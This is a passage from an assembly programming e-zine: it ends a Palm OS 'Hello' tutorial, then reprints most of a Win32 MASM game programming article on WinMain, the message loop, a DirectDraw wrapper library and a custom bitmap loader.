; addq.l #2,a7 = correct stack
PmReturn
; Just a Label
endproc
; Sefiní, endproc executes the unlk and rts instructions
;-----------------------Resources------------------------------
; Here we must 'tell' pila all those resources that we created so it will
; include them to our assembled code.
; We now declare ALL the resources being used by Hello.asm, the keyword
'res'
; is first placed; followed by the TYPE of the resource.
;-=Alert Resources=-
res 'Talt', MyAlert, "Talt03e8.bin"
; This resource defines launch flags, stack and heap size :)
res 'pref', 1
dc.w
sysAppLaunchFlagNewStack|sysAppLaunchFlagNewGlobals|sysAppLaunc
hFlagUIApp|sysAppLaunchFlagSubCall
dc.l $1000 ; stack size
dc.l $1000 ; heap size
;------------------------------ end
--------------------------------------------
That's all my friends! to assemble and link this program execute the
following:
pilrc Hello.rcp
pila Hello.asm
Pilrc being the resource compiler and pila the assembler of course.
Well, that's it! easy huh? Next time i'll complicate things a little bit
including a Form :)
Should your Palm Asm hunger be unstoppable, you could check my site
for more coding and reversing stuff: www.latigo.cjb.net.
Take Care! Bye!
Latigo
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.............................................GAMING.CORNER
Win32 ASM Game Programming -
Part 2
by Chris Hobbs
[This series of articles was first posted at GameDev.net and is now
being
published here with the author's permission. Here is Chris Hobbs'
introduction
on this particular article:
"A continuation of the development of SPACE-TRIS. This one covers the
coding
of WinMain, a Direct Draw library, and a Bitmap library."
Visit his website at http://www.fastsoftware.com.
Preface, Html-to-Txt conversion and formating by Chili]
Where Did We Leave Off?
-----------------------
The last article discussed many basics of Win32 ASM programming, introduced
you
to the game we will be creating, and guided you through the design process.
Now
it is time to take it a few steps further. First, I will cover, in depth,
the
High Level constructs of MASM that make it extremely readable ( at generally
no
performance cost ), and make it as easy to write as C expressions. Then,
once
we have a solid foundation in our assembler we will take a look at the Game
Loop and the main Windows procedures in the code. With that out of the way
we
will take a peek at Direct Draw and the calls associated with it. Once, we
understand how DirectX works we can build our Direct Draw library. After
that
we will build our bitmap file library. Finally, we will put it all together
in
a program that displays our Loading Game screen and exits when you hit the
escape key.
It is a pretty tall order but I am pretty sure we can cover all of the
topics
in this article. Remember: If you want to compile the code you need the
MASM32
[http://www.pbq.com.au/home/hutch/] package, or at the very least a copy of
MASM 6.11+.
If you are already familiar with MASM's HL syntax then I would suggest
skipping
the next section. However, those of you who are rusty, or have never even
heard
of it, head on to the next section. There you will learn more than you will
probably ever need to know about this totally cool addition to our
assembler.
MASM's HL Syntax
----------------
I am sure many of you have seen an old DOS assembly language listing. Take a
moment to recall that listing, and picture the code. Scary? Well, 9 times
out
of 10 it was scary. Most ASM programmers wrote very unreadable code, simply
because that was the nature of their assembler. It was littered with labels
and
jmp's, and all sorts of other mysterious things. Try stepping through it
with
your mental computer. Did you crash? Yeah, don't feel bad. It is just how it
is. Now, that was the 9 out of 10 ... what about that 1 out of 10? What is
the
deal with them? Well, those are the programmers who coded MACRO's to
facilitate
High Level constructs in their programs. For once, Microsoft did something
incredibly useful with MASM 6.0 ... they built those HL MACRO's, that smart
programmers had devised, into MASM as pseudo-ops.
If you aren't aware of what this means I will let you in on it. MASM's
assembly
code is now just as readable and easy to write as C. This, of course, is
just
my opinion. But, it is an opinion shared by thousands and thousands of ASM
coders. So, now that I have touted its usefulness let's take a look at some
C
constructs and their MASM counterparts.
IF - ELSE IF - ELSE
The C version: The MASM version:
if ( var1 == var2 ) .if ( var1 == var2 )
{ ; Code goes here
// Code goes here .elseif ( var1 == var3 )
} ; Code goes here
else .else
if ( var1 == var3 ) ; Code goes here
{ .endif
// Code goes here
}
else
{
// Code goes here
}
DO - WHILE
The C version: The MASM version:
do .repeat
{ ; Code goes here
// Code goes here .until ( var1 != var2 )
}
while ( var1 == var2 );
WHILE
The C version: The MASM version:
while ( var1 == var2 ) .while ( var1 == var2 )
{ ; Code goes here
// Code goes here .endw
}
Those are the constructs that we can use in our code. As you can see they
are
extremely simple and allow for nice readable code. Something assembly
language
has long been without. There is no performance loss for using these
constructs,
at least I haven't found any. They typically generate the same jmp and cmp
code
that a programmer would if he were writing it with labels and such. So, feel
free to use them in your code as you see fit ... they are a great asset.
There is one other thing we should discuss and that is the psuedo-ops that
allow us to define procedures/functions easily. PROTO and PROC. Using them
is
really simple. To begin with, just as in C you need to have a prototype. In
MASM this is done with the PROTO keyword. Here are some examples of
declaring
protoypes for your procedures:
;==================================
; Main Program Procedures
;==================================
WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
The above code tells the assembler it should expect a procedure by the name
of
WinMain and one by the name of WndProc. Each of these has a parameter list
associated with them. They both happen to expect 4 DWORD values to be passed
to
them. For those of you using the MASM32 package, you already have all of the
Windows API functions prototyped, you just need to include the appropriate
include file. But, you need to make sure that any user defined procedure is
prototyped in the above fashion.
Once we have the function prototyped we can create it. We do this with the
PROC
keyword. Here is an example:
;########################################################################
; WinMain Function
;########################################################################
WinMain PROC hInstance :DWORD,
hPrevInst :DWORD,
CmdLine :DWORD,
CmdShow :DWORD
;===========================
; We are through
;===========================
return msg.wParam
WinMain endp
;########################################################################
; End of WinMain Procedure
;########################################################################
By writing our functions in this manner we can access all passed parameters
by
the name we give to them. The above function is WinMain w/o any code in it.
You
will see the code in a minute. For now though, pay attention to how we setup
the procedure. Also notice how it allows us to create much cleaner looking
code, just like the rest of the high level constructs in MASM do also.
Getting A Game Loop Running
---------------------------
Now that we all know how to use our assembler, and the features contained in
it, lets get a basic game shell up and running.
The first thing we need to do is get setup to enter into WinMain(). You may
be
wondering why the code doesn't start at WinMain() like in C/C++. The answer
is:
in C/C++ it doesn't start there either. The code that we will write is
generated for you by the compiler, therefore it is completely transparent to
you. We will most likely do it differently than the compiler, but the
premise
will be the same. So here is what we will code to get into the WinMain()
function...
.CODE
start:
;==================================
; Obtain the instance for the
; application
;==================================
INVOKE GetModuleHandle, NULL
MOV hInst, EAX
;==================================
; Is there a commandline to parse?
;==================================
INVOKE GetCommandLine
MOV CommandLine, EAX
;==================================
; Call the WinMain procedure
;==================================
INVOKE WinMain,hInst,NULL,CommandLine,SW_SHOWDEFAULT
;==================================
; Leave the program
;==================================
INVOKE ExitProcess,EAX
The only thing that may seem a little confusing is why we MOV EAX into a
variable at the end of a INVOKE. The reason is all Windows functions, and C
functions for that matter, place the return value of a function/procedure in
EAX. So we are effectively doing an assignment statement with a function
when
we move a value from EAX into something. This code above is going to be the
same for every Windows application that you write. At least, I have never
had
need to change it. The code simply sets everything up and ends it when we
are
finished.
If you follow the code you will see that it calls WinMain() for us. This is
where things can get a bit confusing ... so let's have a look at the code
first.
;########################################################################
; WinMain Function
;########################################################################
WinMain PROC hInstance :DWORD,
hPrevInst :DWORD,
CmdLine :DWORD,
CmdShow :DWORD
;====================
; Put LOCALs on stack
;====================
LOCAL wc :WNDCLASS
;==================================================
; Fill WNDCLASS structure with required variables
;==================================================
MOV wc.style, CS_OWNDC
MOV wc.lpfnWndProc,OFFSET WndProc
MOV wc.cbClsExtra,NULL
MOV wc.cbWndExtra,NULL
m2m wc.hInstance,hInst ;<< NOTE: macro not mnemonic
INVOKE GetStockObject, BLACK_BRUSH
MOV wc.hbrBackground, EAX
MOV wc.lpszMenuName,NULL
MOV wc.lpszClassName,OFFSET szClassName
INVOKE LoadIcon, hInst, IDI_ICON ; icon ID
MOV wc.hIcon,EAX
INVOKE LoadCursor,NULL,IDC_ARROW
MOV wc.hCursor,EAX
;================================
; Register our class we created
;================================
INVOKE RegisterClass, ADDR wc
;===========================================
; Create the main screen
;===========================================
INVOKE CreateWindowEx,NULL,
ADDR szClassName,
ADDR szDisplayName,
WS_POPUP OR WS_CLIPSIBLINGS OR \
WS_MAXIMIZE OR WS_CLIPCHILDREN,
0,0,640,480,
NULL,NULL,
hInst,NULL
;===========================================
; Put the window handle in for future uses
;===========================================
MOV hMainWnd, EAX
;====================================
; Hide the cursor
;====================================
INVOKE ShowCursor, FALSE
;===========================================
; Display our Window we created for now
;===========================================
INVOKE ShowWindow, hMainWnd, SW_SHOWDEFAULT
;=================================
; Intialize the Game
;=================================
INVOKE Game_Init
;========================================
; Check for an error if so leave
;========================================
.IF EAX != TRUE
JMP shutdown
.ENDIF
;===================================
; Loop until PostQuitMessage is sent
;===================================
.WHILE TRUE
INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE
.IF (EAX != 0)
;===================================
; Break if it was the quit message
;===================================
MOV EAX, msg.message
.IF EAX == WM_QUIT
;======================
; Break out
;======================
JMP shutdown
.ENDIF
;===================================
; Translate and Dispatch the message
;===================================
INVOKE TranslateMessage, ADDR msg
INVOKE DispatchMessage, ADDR msg
.ENDIF
;================================
; Call our Main Game Loop
;
; NOTE: This is done every loop
; iteration no matter what
;================================
INVOKE Game_Main
.ENDW
shutdown:
;=================================
; Shutdown the Game
;=================================
INVOKE Game_Shutdown
;=================================
; Show the Cursor
;=================================
INVOKE ShowCursor, TRUE
getout:
;===========================
; We are through
;===========================
return msg.wParam
WinMain endp
;########################################################################
; End of WinMain Procedure
;########################################################################
This is quite a bit of code and is rather daunting at first glance. But,
let's
examine it a piece at a time. First we enter the function, notice that the
local variables ( in this case a WNDCLASS variable ) get placed on the stack
without your having to code anything. The code is generated for you ... you
can
declare local variables like in C. Thus, at the end of the procedure we
don't
need to tell the assembler how much to pop off of the stack ... it is done
for
us also. Then, we fill in this structure with various values and variables.
Note the use of m2m. This is because in ASM you are not allowed to move a
memory value to another memory location w/o placing it in a register, or on
the
stack first.
Next, we make some calls to register our window class and create a new
window.
Then, we hide the cursor. You may want the cursor ... but for our game we do
not. Now we can show our window and try to initialize our game. We check for
an
error after calling the Game_Init() procedure. If there was an error the
function would not return true and this would cause our program to jump to
the
shutdown label. It is important that we jump over the main message loop. If
we
do not, the program will continue executing. Also, make sure that you do not
just return out of the code ... there still may be some things that need to
be
shutdown. It is good practice in ASM, just as in all other languages, to
have
one entry point and one exit point in each of your procedures -- this makes
debugging easier.
Now for the meat of WinMain(): the message loop. For those of you that have
never seen a Windows message loop before here is a quick explanation.
Windows
maintains a queue of messages that the application receives -- whether from
other applications, user generated, or internal. In order to do ANYTHING an
application must process messages. These tell you that a key has been
pressed,
the mouse button clicked, or the user wants to exit your program. If this
were
a normal program, and not a high performance game, we would use GetMessage()
to
retrieve a message from the queue and act upon it.
The problem however is, if there are no messages, the function WAITS until
it
receives one. This is totally unacceptable for a game. We need to be
constantly
performing our loop, no matter what messages we receive. So, one way around
this, is to use PeekMessage() instead. PeekMessage() will return zero if it
has
no messages, otherwise it will grab it off of the queue.
What this means is, if we have a message, it will get translated and
dispatched
to our callback function. Furthermore, if we do not, then the main game loop
will be called instead. Now here is the trick, by arranging the code just
right, the main game loop will be called -- even if we process a message. If
we
did not do this, then Windows could process 1,000's of messages while our
game
loop wouldn't execute once!
Finally, when a quit message is passed to the queue we will jump out of our
loop and execute the shutdown code. And that ... is the basic game loop.
Connecting to Direct Draw
-------------------------
Now we are going to get a little bit advanced. But, only for this section.
Unfortunately there is no cut and dry way to view DirectX in assembly. So, I
am
going to explain it briefly, show you how to use it, and then forget about
it.
This is not that imperative to know about, but it helps if you at least
understand the concepts.
The very first thing you need to understand is the concept of a Virtual
Function Table. This is where your call really goes to be blunt about it.
The
call offsets into this table, and from it selects the proper function
address
to jump to. What this means to you is your call to a function is actually a
call to a simple look-up table that is already generated. in this way,
DirectX
or any other type library such as DirectX can change functions in a library
w/o
you ever having to know about it.
Once we have gotten that straight we can figure out how to make calls in
DirectX. Have you guessed how yet? The answer is we need to mimic the table
in
some way so that our call is offset into the virtual table at the proper
address. We start by simply having a base address that gets called, which is
a
given in DirectX libraries. Then we make a list of all functions for that
object appending the size of their parameters. This is our offset into the
table. Now, we are all set to call the functions.
Calling these functions can be a bit of work. First you have to specify the
address of the object that you want to make the call on. Then, you have to
resolve the virtual address, and then, finally, push all of the parameters
onto
the stack, including the object, for the call. Ugly isn't it? For that
reason
there is a set of macros provided that will allow you to make calls for
these
objects fairly easily. I will only cover one since the rest are based on the
same premise. The most basic one is DD4INVOKE. This macro is for a Direct
Draw
4 object. It is important that we have different invokes for different
versions
of the same object. If we did not, then wrong routines would be called since
the Virtual Table changes as they add/remove functions from the lib's.
The idea behind the macro is fairly simple. First, you specify the function
name, then the object name, and then the parameters. Here is an example:
;========================================
; Now create the primary surface
;========================================
DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL
The above line of code calls the CreateSurface() function on a Direct Draw 4
object. It passes the pointer to the object, the address of a Direct Draw
Surface Describe structure, the address of the variable to hold the pointer
to
the surface, and finally NULL. This call is an example of how we will
interface
to DirectX in this article series. Now that we have seen how to make calls
to
DirectX, we need to build a small library for us to use which we cover in
the
next section.
Our Direct Draw Library
-----------------------
Alright, we are now ready to start coding our Direct Draw library routines.
So,
the logical starting place would be figuring out what kinds of routines we
will
need for the game. Obviously we want an initialization and shutdown routine,
and we are going to need a function to lock and unlock surfaces. Also, it
would
be nice to have a function to draw text, and, since the game is going to run
in
16 bpp mode, we will want a function that can figure out the pixel format
for
us. It would also be a good idea to have a function that creates surfaces,
loads a bitmap into a surface, and a function to flip our buffers for us.
That
should cover it ... so lets get started.
The first routine that we will look at is the initialization routine. This
is
the most logical place to start, especially since the routine has just about
every type of call we will be using in Direct Draw. Here is the code:
;########################################################################
; DD_Init Procedure
;########################################################################
DD_Init PROC screen_width:DWORD, screen_height:DWORD, screen_bpp:DWORD
;=======================================================
; This function will setup DD to full screen exclusive
; mode at the passed in width, height, and bpp
;=======================================================
;=================================
; Local Variables
;=================================
LOCAL lpdd_1 :LPDIRECTDRAW
;=============================
; Create a default object
;=============================
INVOKE DirectDrawCreate, 0, ADDR lpdd_1, 0
;=============================
; Test for an error
;=============================
.IF EAX != DD_OK
;======================
; Give err msg
;======================
INVOKE MessageBox, hMainWnd, ADDR szNoDD, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;=========================================
; Lets try and get a DirectDraw 4 object
;=========================================
DDINVOKE QueryInterface, lpdd_1, ADDR IID_IDirectDraw4, ADDR lpdd
;=========================================
; Did we get it??
;=========================================
.IF EAX != DD_OK
;==============================
; No so give err message
;==============================
INVOKE MessageBox, hMainWnd, ADDR szNoDD4, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;===================================================
; Set the cooperative level
;===================================================
DD4INVOKE SetCooperativeLevel, lpdd, hMainWnd, \
DDSCL_ALLOWMODEX OR DDSCL_FULLSCREEN OR \
DDSCL_EXCLUSIVE OR DDSCL_ALLOWREBOOT
;=========================================
; Did we get it??
;=========================================
.IF EAX != DD_OK
;==============================
; No so give err message
;==============================
INVOKE MessageBox, hMainWnd, ADDR szNoCoop, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;===================================================
; Set the Display Mode
;===================================================
DD4INVOKE SetDisplayMode, lpdd, screen_width, \
screen_height, screen_bpp, 0, 0
;=========================================
; Did we get it??
;=========================================
.IF EAX != DD_OK
;==============================
; No so give err message
;==============================
INVOKE MessageBox, hMainWnd, ADDR szNoDisplay, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;================================
; Save the screen info
;================================
m2m app_width, screen_width
m2m app_height, screen_height
m2m app_bpp, screen_bpp
;========================================
; Setup to create the primary surface
;========================================
DDINITSTRUCT OFFSET ddsd, SIZEOF(DDSURFACEDESC2)
MOV ddsd.dwSize, SIZEOF(DDSURFACEDESC2)
MOV ddsd.dwFlags, DDSD_CAPS OR DDSD_BACKBUFFERCOUNT;
MOV ddsd.ddsCaps.dwCaps, DDSCAPS_PRIMARYSURFACE OR \
DDSCAPS_FLIP OR DDSCAPS_COMPLEX
MOV ddsd.dwBackBufferCount, 1
;========================================
; Now create the primary surface
;========================================
DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL
;=========================================
; Did we get it??
;=========================================
.IF EAX != DD_OK
;==============================
; No so give err message
;==============================
INVOKE MessageBox, hMainWnd, ADDR szNoPrimary, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;==========================================
; Try to get a backbuffer
;==========================================
MOV ddscaps.dwCaps, DDSCAPS_BACKBUFFER
DDS4INVOKE GetAttachedSurface, lpddsprimary, ADDR ddscaps, ADDR
lpddsback
;=========================================
; Did we get it??
;=========================================
.IF EAX != DD_OK
;==============================
; No so give err message
;==============================
INVOKE MessageBox, hMainWnd, ADDR szNoBackBuffer, NULL,
MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;==========================================
; Get the RGB format of the surface
;==========================================
INVOKE DD_Get_RGB_Format, lpddsprimary
done:
;===================
; We completed
;===================
return TRUE
err:
;===================
; We didn't make it
;===================
return FALSE
DD_Init ENDP
;########################################################################
; END DD_Init
;########################################################################
The above code is fairly complex so let's see what each individual section
does.
The first step is we create a default Direct Draw object. This is nothing
more
than a simple call with a couple of parameters. NOTE: since it is NOT based
on
an already created object, the function is not virtual. Therefore, we can
call
it like a normal function using invoke. Also, notice how we check for an
error
right afterwards. This is very important in DirectX. In the case of an
error,
we merely give a message, and then jump to the error return at the bottom of
the procedure.
The second step is we query for a DirectDraw4 object. We will almost always
want the newest version of the objects, and querying after you have the base
object is the way to get them. If this succeeds we then set the cooperative
level and the display mode for our game. Nothing major ... but don't forget
to
check for errors.
Our next step is to create a primary surface for the object that we have. If
that succeeds we create the back buffer. The structure that we use in this
call, and other DirectX calls, needs to be cleared before using it. This is
done in a macro, DDINITSTRUCT, that I have included in the DDraw.inc file.
The final thing we do is make a call to our routine that determines the
pixel
format for our surfaces. All of these pieces fit together into initializing
our
system for use.
The next routine we will look at is the pixel format obtainer. This is a
fairly
advanced routine so I wanted to make sure that we cover it. Here is the
code:
;########################################################################
; DD_Get_RGB_Format Procedure
;########################################################################
DD_Get_RGB_Format PROC surface:DWORD
;=========================================================
; This function will setup some globals to give us info
; on whether the pixel format of the current diaplay mode
;=========================================================
;====================================
; Local variables
;====================================
LOCAL shiftcount :BYTE
;================================
; get a surface despriction
;================================
DDINITSTRUCT ADDR ddsd, sizeof(DDSURFACEDESC2)
MOV ddsd.dwSize, sizeof(DDSURFACEDESC2)
MOV ddsd.dwFlags, DDSD_PIXELFORMAT
DDS4INVOKE GetSurfaceDesc, surface, ADDR ddsd
;==============================
; fill in masking values
;==============================
m2m mRed, ddsd.ddpfPixelFormat.dwRBitMask ; Red Mask
m2m mGreen, ddsd.ddpfPixelFormat.dwGBitMask ; Green Mask
m2m mBlue, ddsd.ddpfPixelFormat.dwBBitMask ; Blue Mask
;====================================
; Determine the pos for the red mask
;====================================
MOV shiftcount, 0
.WHILE (!(ddsd.ddpfPixelFormat.dwRBitMask & 1))
SHR ddsd.ddpfPixelFormat.dwRBitMask, 1
INC shiftcount
.ENDW
MOV AL, shiftcount
MOV pRed, AL
;=======================================
; Determine the pos for the green mask
;=======================================
MOV shiftcount, 0
.WHILE (!(ddsd.ddpfPixelFormat.dwGBitMask & 1))
SHR ddsd.ddpfPixelFormat.dwGBitMask, 1
INC shiftcount
.ENDW
MOV AL, shiftcount
MOV pGreen, AL
;=======================================
; Determine the pos for the blue mask
;=======================================
MOV shiftcount, 0
.WHILE (!(ddsd.ddpfPixelFormat.dwBBitMask & 1))
SHR ddsd.ddpfPixelFormat.dwBBitMask, 1
INC shiftcount
.ENDW
MOV AL, shiftcount
MOV pBlue, AL
;===========================================
; Set a special var if we are in 16 bit mode
;===========================================
.IF app_bpp == 16
.IF pRed == 10
MOV Is_555, TRUE
.ELSE
MOV Is_555, FALSE
.ENDIF
.ENDIF
done:
;===================
; We completed
;===================
return TRUE
DD_Get_RGB_Format ENDP
;########################################################################
; END DD_Get_RGB_Format
;########################################################################
First, we initialize our description structure and make a call to get the
surface description from Direct Draw. We place the masks that are returned
in
global variables, since we will want to use them in all kinds of places. A
mask
is a value that you can use to set or clear certain bits in a
variable/register. In our case, we use them to mask off the unnecessary bits
so
that we can access the red, green, or blue bits of our pixel individually.
The next three sections of code are used to determine the number of bits in
each color component. For example, if we had set the mode to 24 bpp, then
there
would be 8-bits in every component. The way we determine the number of bits
it
needs to be moved is by shifting each mask to the right by 1 and AND'ing it
with the number one. This allows us to effectively count all the bits we
need
to shift by in order to move our component into its proper position. This
works
because the mask is going to contain a 1 where the bits are valid. So, by
AND'ing it with the 1 we are able to see if the bit was turned on or not,
since
the number one will leave only the first bit set and turn all others off.
Finally, we set a variable that tells us whether or not the video mode is
5-5-5
or 5-6-5. This is extremely important since 16 bpp mode can be either, and
we
do not want our pictures to have a green or purple tint on one machine, and
look fine on another one!
The last function that I want to cover in our Direct Draw library is the
text
drawing function. This uses GDI and so I figured I should at least give it a
small explanation. The code ...
;########################################################################
; DD_Draw_Text Procedure
;########################################################################
DD_Draw_Text PROC surface:DWORD, text:DWORD, num_chars:DWORD,
x:DWORD, y:DWORD, color:DWORD
;=======================================================
; This function will draw the passed text on the passed
; surface using the passed color at the passed coords
; with GDI
;=======================================================
;===========================================
; First we need to get a DC for the surface
;===========================================
DDS4INVOKE GetDC, surface, ADDR hDC
;===========================================
; Set the text color and BK mode
;===========================================
INVOKE SetTextColor, hDC, color
INVOKE SetBkMode, hDC, TRANSPARENT
;===========================================
; Write out the text at the desired location
;===========================================
INVOKE TextOut, hDC, x, y, text, num_chars
;===========================================
; release the DC we obtained
;===========================================
DDS4INVOKE ReleaseDC, surface, hDC
done:
;===================
; We completed
;===================
return TRUE
DD_Draw_Text ENDP
;########################################################################
; END DD_Draw_Text
;########################################################################
Following this code is relatively simple. First, we get the Device Context
for
our surface. In Windows, drawing is typically done through these DC's (
Device
Contexts ), thus ... if you want to use any GDI function in Direct Draw the
first thing you have to do is get the DC for your surface. Then, we set the
background mode and text color using basic Windows GDI calls. Now, we are
ready
to draw our text ... again we just make a call to the Windows function
TextOut(). There are many others, this is just the one that I chose to use.
Finally, we release the DC for our surface.
The rest of the Direct Draw routines follow the same basic format and use
the
same types of calls, so they shouldn't be too hard to figure out. The basic
idea behind all of the routines is the same: encapsulate the functionality
we
need into some services that still allow us to be flexible. Now, we need to
write the code to handle our bitmaps that go into these surfaces.
Our Bitmap Library
------------------
We are now ready to write our bitmap library. We will start like the Direct
Draw library by determining what we need. As far as I can tell right now, we
should be good with two simple routines: a bitmap loader, and a draw
routine.
Since we will be using surfaces, the draw routine should draw onto the
passed
surface. Our loader will load our special file format which I will cover in
a
moment. That should be it, there isn't that much that is needed for bitmaps
nowadays. DirectX is how most manipulation occurs, especially since many
things
can be done in hardware. With that in mind we will cover our unique file
format.
Normally, creating your own file format is a headache and isn't worth the
trouble. However, in our case it greatly simplifies the code and I have
provided the conversion utility with the download package. This format is
probably one of the easiest you will ever encounter. It has five main parts:
Width, Height, BPP, Size of Buffer, and Buffer. The first three give
information on the image. I have our library setup for 16 bpp only but
implementing other bit depths would be fairly easy. The fourth section tells
us
how large of a buffer we need for the image, and the fifth section is that
buffer. Having our own format not only makes the code we need to write a lot
easier, it also prevents other people from seeing our work before they were
meant to see it! Now, how do we load this bad boy?
;########################################################################
; Create_From_SFP Procedure
;########################################################################
Create_From_SFP PROC ptr_BMP:DWORD, sfp_file:DWORD, desired_bpp:DWORD
;=========================================================
; This function will allocate our bitmap structure and
; will load the bitmap from an SFP file. Converting if
; it is needed based on the passed value.
;=========================================================
;=================================
; Local Variables
;=================================
LOCAL hFile :DWORD
LOCAL hSFP :DWORD
LOCAL Img_Left :DWORD
LOCAL Img_Alias :DWORD
LOCAL red :DWORD
LOCAL green :DWORD
LOCAL blue :DWORD
LOCAL Dest_Alias :DWORD
;=================================
; Create the SFP file
;=================================
INVOKE CreateFile, sfp_file, GENERIC_READ,FILE_SHARE_READ, \
NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL
MOV hFile, EAX
;===============================
; Test for an error
;===============================
.IF EAX == INVALID_HANDLE_VALUE
JMP err
.ENDIF
;===============================
; Get the file size
;===============================
INVOKE GetFileSize, hFile, NULL
PUSH EAX
;================================
; test for an error
;================================
.IF EAX == -1
JMP err
.ENDIF
;==============================================
; Allocate enough memeory to hold the file
;==============================================
INVOKE GlobalAlloc, GMEM_FIXED, EAX
MOV hSFP, EAX
;===================================
; test for an error
;===================================
.IF EAX == 0
JMP err
.ENDIF
;===================================
; Put the file into memory
;===================================
POP EAX
INVOKE ReadFile, hFile, hSFP, EAX, OFFSET Amount_Read, NULL
;====================================
; Test for an error
;====================================
.IF EAX == FALSE
;========================
; We failed so leave
;========================
JMP err
.ENDIF
;===================================
; Determine the size without the BPP
;===================================
MOV EBX, hSFP
MOV EAX, DWORD PTR [EBX]
ADD EBX, 4
MOV ECX, DWORD PTR [EBX]
MUL ECX
PUSH EAX
;======================================
; Do we allocate a 16 or 24 bit buffer
;======================================
.IF desired_bpp == 16
;============================
; Just allocate a 16-bit
;============================
POP EAX
SHL EAX, 1
INVOKE GlobalAlloc, GMEM_FIXED, EAX
MOV EBX, ptr_BMP
MOV DWORD PTR [EBX], EAX
MOV Dest_Alias, EAX
;====================================
; Test for an error
;====================================
.IF EAX == FALSE
;========================
; We failed so leave
;========================
JMP err
.ENDIF
.ELSE
;========================================
; This is where code for 24 bit would go
;========================================
;============================
; For now just return an err
;============================
JMP err
.ENDIF
;====================================
; Setup for reading in
;====================================
MOV EBX, hSFP
ADD EBX, 10
MOV EAX, DWORD PTR[EBX]
MOV Img_Left, EAX
ADD EBX, 4
MOV Img_Alias, EBX
;====================================
; Now lets start converting values
;====================================
.WHILE Img_Left > 0
;==================================
; Build a color word based on
; the desired BPP or transfer
;==================================
.IF desired_bpp == 16
;==========================================
; Read in a byte for blue, green and red
;==========================================
XOR ECX, ECX
MOV EBX, Img_Alias
MOV CL, BYTE PTR [EBX]
MOV blue, ECX
INC EBX
MOV CL, BYTE PTR [EBX]
MOV green, ECX
INC EBX
MOV CL, BYTE PTR [EBX]
MOV red, ECX
;=======================
; Adjust the Img_Alias
;=======================
ADD Img_Alias, 3
;================================
; Do we build a 555 or a 565 val
;================================
.IF Is_555 == TRUE
;============================
; Build the 555 color word
;============================
RGB16BIT_555 red, green, blue
.ELSE
;============================
; Build the 565 color word
;============================
RGB16BIT_565 red, green, blue
.ENDIF
;================================
; Transer it to the final buffer
;================================
MOV EBX, Dest_Alias
MOV WORD PTR [EBX], AX
;============================
; Adjust the dest by 2
;============================
ADD Dest_Alias, 2
.ELSE
;========================================
; This is where code for 24 bit would go
;========================================
;============================
; For now just return an err
;============================
JMP err
.ENDIF
;=====================
; Sub amount left by 3
;=====================
SUB Img_Left, 3
.ENDW
;====================================
; Free the SFP Memory
;====================================
INVOKE GlobalFree, hSFP
done:
;===================
; We completed
;===================
return TRUE
err:
;====================================
; Free the SFP Memory
;====================================
INVOKE GlobalFree, hSFP
;===================
; We didn't make it
;===================
return FALSE
Create_From_SFP ENDP
;########################################################################
; END Create_From_SFP
;########################################################################
The code starts out by creating the file, which, in Windows, is how you open
it, and then retrieves the file size. This allows us to allocate enough
memory
to load our entire file in. The process of reading in the file is fairly
simple
we just make a call. As usual the most important parts are those that check
for
errors.
Once the file is in memory we compute the size of the desired image based
upon
the width and height in our header, and the "desired_bpp" level that was
passed
in to the function. Then we allocate yet another buffer with the information
we
calculated. This is the buffer that is kept in the end.
The next step is the heart of our load function. Here we read in 3 bytes,
since
our pictures are stored as 24-bit images, and create the proper color value
( 5-6-5 or 5-5-5 ) for the buffer. We then store that value in the new
buffer
that we just created. We loop through all pixels in our bitmap and convert
each
to the desired format. The conversion is based on a pre-defined macro. You
could also implement the function by using the members we filled, when we
called the function to get the pixel format. This second way would allow you
to
have a more abstract interface to the code ... but for our purposes it was
better to see what was really happening to the bits.
At the completion of our loop we free the main buffer and return the address
of
the buffer with our converted pixel values. If an error occurs at any point,
we
jump to our error code which frees the possible buffer we could have
created.
This is to prevent memory leaks. And ... that is it for the load function.
Once the bitmap is loaded into memory we need to be able to draw it onto a
Direct Draw surface. Whether we are loading it in there permanently, or just
drawing a quick picture onto the back buffer should not matter. So, we will
look at a function that draws the passed bitmap onto our passed surface.
Here
is the code:
;########################################################################
; Draw_Bitmap Procedure
;########################################################################
Draw_Bitmap PROC surface:DWORD, bmp_buffer:DWORD, lPitch:DWORD, bpp:DWORD
;=========================================================
; This function will draw the BMP on the surface.
; the surface must be locked before the call.
;
; It uses the width and height of the screen to do so.
; I hardcoded this in just 'cause ... okay.
;
; This routine does not do transparency!
;=========================================================
;===========================
; Local Variables
;===========================
LOCAL dest_addr :DWORD
LOCAL source_addr :DWORD
;===========================
; Init the addresses
;===========================
MOV EAX, surface
MOV EBX, bmp_buffer
MOV dest_addr, EAX
MOV source_addr, EBX
;===========================
; Init counter with height
;
; Hard-coded in.
;===========================
MOV EDX, 480
;=================================
; We are in 16 bit mode
;=================================
copy_loop1:
;=============================
; Setup num of bytes in width
;
; Hard-coded also.
;
; 640*2/4 = 320.
;=============================
MOV ECX, 320
;=============================
; Set source and dest
;=============================
MOV EDI, dest_addr
MOV ESI, source_addr
;======================================
; Move by DWORDS
;======================================
REP movsd
;==============================
; Adjust the variables
;==============================
MOV EAX, lPitch
MOV EBX, 1280
ADD dest_addr, EAX
ADD source_addr, EBX
;========================
; Dec the line counter
;========================
DEC EDX
;========================
; Did we hit bottom?
;========================
JNE copy_loop1
done:
;===================
; We completed
;===================
return TRUE
err:
;===================
; We didn't make it
;===================
return FALSE
Draw_Bitmap ENDP
;########################################################################
; END Draw_Bitmap
;########################################################################
This function is a little bit more advanced than some of the others we have
seen, so pay attention. We know, as assembly programmers, that if we can get
everything into a register things will be faster than if we had to access
memory. So, in that spirit, we place the starting source and destination
